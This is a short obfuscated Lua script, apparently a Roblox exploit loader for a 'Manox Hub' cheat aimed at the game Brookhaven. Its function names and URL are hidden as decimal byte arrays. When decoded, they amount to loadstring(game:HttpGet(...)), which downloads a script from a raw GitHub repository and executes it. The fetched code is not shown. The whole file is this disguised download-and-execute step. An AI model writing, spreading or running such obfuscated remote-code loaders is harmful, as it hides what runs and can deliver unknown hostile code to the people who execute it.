local function D(t)
    local s = ""
    for _,v in ipairs(t) do
        s = s .. string.char(v)
    end
    return s
end

local A = D({108,111,97,100,115,116,114,105,110,103})     
local B = D({103,97,109,101})                                
local C = D({72,116,116,112,71,101,116})                    

local U = {
    {104,116,116,112,115,58,47,47},
    {114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109,47},
    {69,122,74,65,71,65,77,69,83,57,52,47},
    {77,97,110,111,120,45,72,117,98,45,83,99,114,105,112,116,47},
    {114,101,102,115,47,104,101,97,100,115,47,109,97,105,110,47},
    {66,114,111,111,107,104,97,118,101,110}
}

local X = ""
for _,block in ipairs(U) do
    X = X .. D(block)
end

local E = getfenv()

local L = E[A]                 
local G = E[B]                 
local H = G[C]                 

local function Z(x,y)
    return x(y)
end

local function Y(z,q,w)
    return z(q, w)
end

local EXEC = Z(L, Y(H, G, X))
Z(EXEC)
